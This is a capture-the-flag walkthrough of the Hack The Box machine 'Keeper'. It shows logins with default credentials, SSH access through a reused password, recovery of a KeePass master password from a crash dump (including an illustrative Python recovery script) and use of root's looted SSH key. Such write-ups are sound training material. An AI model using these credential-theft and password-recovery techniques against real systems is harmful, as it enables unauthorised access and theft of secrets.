Keeper

Creator: knightmare

Machine URL: https://app.hackthebox.com/machines/Keeper

Difficulty: Easy


Initial enumeration

As usual, we start with a TCP nmap scan.

# Nmap 7.94 scan initiated Sat Aug 12 21:03:18 2023 as: nmap -p- -oA nmap/nmap_initial --min-rate=4000 -vv -sC -sV 10.129.229.41
Nmap scan report for keeper.htb (10.129.229.41)
Host is up, received echo-reply ttl 63 (0.037s latency).
Scanned at 2023-08-12 21:03:19 CEST for 24s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKHZRUyrg9VQfKeHHT6CZwCwu9YkJosNSLvDmPM9EC0iMgHj7URNWV3LjJ00gWvduIq7MfXOxzbfPAqvm2ahzTc=
|   256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBe5w35/5klFq1zo5vISwwbYSVy1Zzy+K9ZCt0px+goO
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 12 21:03:43 2023 -- 1 IP address (1 host up) scanned in 25.48 seconds

Only two ports are open: TCP 80 for nginx and TCP 22 for SSH.
We will target the web server on TCP 80 first.

nginx

After navigating to the machine IP in the browser, we are greeted with a simple web page:

Main webpage

After adding keeper.htb and tickets.keeper.htb to our hosts file, we can visit http://tickets.keeper.htb/rt/

Best Practical Request Tracker (RT)

We have the login page for Best Practical Request Tracker (RT):

tickets.keeper.htb

Software version: 4.4.4
Source code: GitHub

We note that the version is fairly old and we may find some unpatched vulnerabilities.

But first, we can try the default username and password.
Fortunately, root:password works!

Logged in

Interesting tickets

There is only one of interest – http://tickets.keeper.htb/rt/Ticket/Display.html?id=300000

We note the info it gives us:

  • root (Enoch Root) had issues with a KeePass database on Windows and attached its crash dump to the ticket.
  • lnorgaard (Lise Nørgaard) removed the attachment and saved it to their home folder for security reasons.

Credentials for lnorgaard

While exploring the app further, in the Admin -> Users section we find a default password for the user lnorgaard in the comments field of their profile:

http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27

Default password

These credentials are reused and we can SSH to the box as lnorgaard.

lnorgaard

Grab the user flag in /home/lnorgaard/user.txt.

The home folder contains a ZIP archive, RT30000.zip. This must be the attachment mentioned in the ticket we saw earlier.
Transfer it to the attacking machine and unzip it.

┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ unzip RT30000.zip
Archive:  RT30000.zip
  inflating: KeePassDumpFull.dmp
 extracting: passcodes.kdbx

We get the crash dump for KeePass and a KeePass database file.

Extracting the KeePass master password from the dump file

It may be possible to extract the master password from the dump file!
I used this Python script for the task: https://github.com/CMEPW/keepass-dump-masterkey

┌──(fluff㉿kali)-[/tmp/keepass-dump-masterkey]
└─$ python3 poc.py -d /opt/ctf/htb/keeper/KeePassDumpFull.dmp
2023-08-12 21:35:47,517 [.] [main] Opened /opt/ctf/htb/keeper/KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
...

The output has problems with special characters. A quick Google search for dgrd med flde reveals the name of the Danish dish: Rødgrød med fløde.
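To show why a KeePass memory dump gives up the master password minus its first character, and why the ø characters came out mangled in the script's output, here is an added illustration (my own code, not the linked script) that builds a constructed buffer imitating the leftover keystroke strings and scans it the way such a script does. The buffer layout and the names build_leaked_buffer, recover_pattern and ascii_view are assumptions made for this illustration.

```python
import re

MASK = "\u25cf"                         # '●', shown by KeePass for each typed character
MASK_LE = MASK.encode("utf-16-le")      # b'\xcf\x25', how '●' sits in .NET process memory


def build_leaked_buffer(password: str, noise: int = 8) -> bytes:
    """Constructed test data only: emulate the managed heap after the password
    was typed. After keystroke n (n >= 2) a leftover string of n-1 masks followed
    by the n-th character remains; the first keystroke leaves no such string."""
    out = bytearray(b"\x00" * noise)
    for n in range(1, len(password)):
        leftover = MASK * n + password[n]
        out += leftover.encode("utf-16-le") + b"\x00" * noise
    return bytes(out)


def recover_pattern(buf: bytes) -> str:
    """Scan a buffer for UTF-16LE mask runs and collect, per position, the
    characters seen right after them. Position 0 is never observed and stays
    a mask; positions with several candidates are shown in braces."""
    seen = {}  # position -> candidate characters in order of appearance
    for m in re.finditer(rb"((?:\xcf\x25)+)(..)", buf, re.DOTALL):
        pos = len(m.group(1)) // 2                       # number of masks = char index
        ch = m.group(2).decode("utf-16-le", errors="replace")
        seen.setdefault(pos, [])
        if ch not in seen[pos]:
            seen[pos].append(ch)
    if not seen:
        return ""
    pattern = [MASK]
    for pos in range(1, max(seen) + 1):
        cands = seen.get(pos, [MASK])
        pattern.append(cands[0] if len(cands) == 1 else "{" + "".join(cands) + "}")
    return "".join(pattern)


def ascii_view(pattern: str) -> str:
    """What an ASCII-only printer makes of the pattern: every non-ASCII
    character (here the Danish ø) collapses back into a mask, which is why the
    output on this page had to be completed by guesswork."""
    return "".join(c if c.isascii() else MASK for c in pattern)


if __name__ == "__main__":
    dump = build_leaked_buffer("rødgrød med fløde")   # constructed sample password
    found = recover_pattern(dump)
    print(found)               # ●ødgrød med fløde  (first character is never recoverable)
    print(ascii_view(found))   # ●●dgr●d med fl●de
```

Because the first keystroke leaves no trace, the case of the leading letter has to be guessed, which is exactly why the capitalised dish name fails against the database below while the lowercase one opens it.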

I will use the kpcli utility to interact with the KeePass database file that we have looted.

┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ kpcli

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> open passcodes.kdbx
Provide the master password: ************************* #Rødgrød med fløde
Error opening file: Couldn't load the file passcodes.kdbx

Error(s) from File::KeePass:
The database key appears invalid or else the database is corrupt.

kpcli:/> open passcodes.kdbx
Provide the master password: ************************* #rødgrød med fløde
kpcli:/> ls
=== Groups ===
passcodes/

Success! The KeePass database master password is rødgrød med fløde.
Let’s find some credentials.

SSH Private Key for root

kpcli:/> ls *
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/> ls */*
/passcodes/eMail:

/passcodes/General:

/passcodes/Homebanking:

/passcodes/Internet:

/passcodes/Network:
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System

/passcodes/Recycle Bin:
=== Entries ===
2. Sample Entry                                               keepass.info
3. Sample Entry #2                          keepass.info/help/kb/testform.

/passcodes/Windows:
kpcli:/>
kpcli:/> cd /passcodes/Network
kpcli:/passcodes/Network> ls
=== Entries ===
0. keeper.htb (Ticketing Server)
1. Ticketing System
kpcli:/passcodes/Network> show -f 0

Title: keeper.htb (Ticketing Server)
Uname: root
 Pass: <REDACTED>
  URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
       Encryption: none
       Comment: rsa-key-20230519
       Public-Lines: 6
       AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
       <REDACTED>

It looks like we have root's SSH private key in PuTTY format!
Save the Notes field to key.putty and convert it to the OpenSSH format with puttygen:

┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ puttygen key.putty -O private-openssh -o id_rsa

And use the key to SSH:

┌──(fluff㉿kali)-[/opt/ctf/htb/keeper]
└─$ ssh [email protected] -i id_rsa
...
root@keeper:~# id
uid=0(root) gid=0(root) groups=0(root)
root@keeper:~#

We are root!
Grab the root flag in /root/root.txt and we are done.